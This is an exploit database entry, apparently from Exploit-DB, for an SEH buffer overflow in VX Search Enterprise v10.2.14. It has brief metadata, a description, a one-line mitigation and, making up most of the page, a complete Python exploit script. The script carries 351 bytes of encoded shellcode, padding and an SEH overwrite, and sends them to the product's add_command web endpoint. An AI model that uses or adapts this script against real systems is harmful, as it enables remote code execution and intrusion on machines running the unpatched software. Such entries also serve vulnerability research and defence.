VX Search Enterprise v10.2.14 Buffer Overflow (SEH)

vendor:

VX Search Enterprise

by:

W01fier00t

7.5

CVSS

HIGH

Buffer Overflow

119

CWE

Product Name: VX Search Enterprise

Affected Version From: 10.2.14

Affected Version To:

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested: Windows 7 Home Edition sp1

2017

VX Search Enterprise v10.2.14 Buffer Overflow (SEH)

This exploit takes advantage of a buffer overflow vulnerability in VX Search Enterprise v10.2.14. The vulnerability allows an attacker to overwrite the Structured Exception Handler (SEH) and execute arbitrary code. The exploit requires enabling the web server and having login credentials for the VX Search webpage.

Mitigation:

Apply the latest patch or upgrade to a non-affected version of the software.

Source

Exploit-DB raw data:

#!/usr/bin/python


print "*** VX Search Enterprise v10.2.14 Buffer Overflow (SEH) ***\n"

# Exploit Title     : VX Search Enterprise v10.2.14 Buffer Overflow (SEH)
# Discovery by      : W01fier00t
# Twitter           : @wolfieroot
# Discovery Date    : 22/11/2017
# Software Link     : http://www.vxsearch.com/setups/vxsearchent_setup_v10.2.14.exe
# Tested Version    : 10.2.14
# Tested on OS      : Windows 7 Home Edition sp1
# You will need to enable web server for this to work.
# You will also need the Login to VX Search wepage, for this to work.

import urllib
import urllib2
import socket

#Bad chars \x00\x0a\x0d
#Payload size: 351 bytes
shellcode = (
"\xdd\xc6\xb8\x4a\xec\xd2\xea\xd9\x74\x24\xf4\x5d\x2b\xc9\xb1"
"\x52\x83\xc5\x04\x31\x45\x13\x03\x0f\xff\x30\x1f\x73\x17\x36"
"\xe0\x8b\xe8\x57\x68\x6e\xd9\x57\x0e\xfb\x4a\x68\x44\xa9\x66"
"\x03\x08\x59\xfc\x61\x85\x6e\xb5\xcc\xf3\x41\x46\x7c\xc7\xc0"
"\xc4\x7f\x14\x22\xf4\x4f\x69\x23\x31\xad\x80\x71\xea\xb9\x37"
"\x65\x9f\xf4\x8b\x0e\xd3\x19\x8c\xf3\xa4\x18\xbd\xa2\xbf\x42"
"\x1d\x45\x13\xff\x14\x5d\x70\x3a\xee\xd6\x42\xb0\xf1\x3e\x9b"
"\x39\x5d\x7f\x13\xc8\x9f\xb8\x94\x33\xea\xb0\xe6\xce\xed\x07"
"\x94\x14\x7b\x93\x3e\xde\xdb\x7f\xbe\x33\xbd\xf4\xcc\xf8\xc9"
"\x52\xd1\xff\x1e\xe9\xed\x74\xa1\x3d\x64\xce\x86\x99\x2c\x94"
"\xa7\xb8\x88\x7b\xd7\xda\x72\x23\x7d\x91\x9f\x30\x0c\xf8\xf7"
"\xf5\x3d\x02\x08\x92\x36\x71\x3a\x3d\xed\x1d\x76\xb6\x2b\xda"
"\x79\xed\x8c\x74\x84\x0e\xed\x5d\x43\x5a\xbd\xf5\x62\xe3\x56"
"\x05\x8a\x36\xf8\x55\x24\xe9\xb9\x05\x84\x59\x52\x4f\x0b\x85"
"\x42\x70\xc1\xae\xe9\x8b\x82\x10\x45\x93\x4a\xf9\x94\x93\x74"
"\x98\x11\x75\xe2\x4a\x74\x2e\x9b\xf3\xdd\xa4\x3a\xfb\xcb\xc1"
"\x7d\x77\xf8\x36\x33\x70\x75\x24\xa4\x70\xc0\x16\x63\x8e\xfe"
"\x3e\xef\x1d\x65\xbe\x66\x3e\x32\xe9\x2f\xf0\x4b\x7f\xc2\xab"
"\xe5\x9d\x1f\x2d\xcd\x25\xc4\x8e\xd0\xa4\x89\xab\xf6\xb6\x57"
"\x33\xb3\xe2\x07\x62\x6d\x5c\xee\xdc\xdf\x36\xb8\xb3\x89\xde"
"\x3d\xf8\x09\x98\x41\xd5\xff\x44\xf3\x80\xb9\x7b\x3c\x45\x4e"
"\x04\x20\xf5\xb1\xdf\xe0\x05\xf8\x7d\x40\x8e\xa5\x14\xd0\xd3"
"\x55\xc3\x17\xea\xd5\xe1\xe7\x09\xc5\x80\xe2\x56\x41\x79\x9f"
"\xc7\x24\x7d\x0c\xe7\x6c")

#0x1001a136 : pop edi # pop esi # ret 0x04 |  {PAGE_EXECUTE_READ} [libspp.dll]
cmdname = "\x90" *16
cmdname += shellcode
cmdname += "A" * 157
cmdname += "\xEB\x06"
cmdname += "B" *2
cmdname += "\x36\xa1\x01\x10"

print " [*] Sending payload!..."
url = 'http://127.0.0.1/add_command?sid=f3fdf2603e9ac8f518db9452fee62110'
values = {'command_name' : cmdname}
data = urllib.urlencode(values)
req = urllib2.Request(url, data)

try:
	response = urllib2.urlopen(req, timeout = 1)
except socket.timeout:
	pass

print " [*] DONE! :D\n"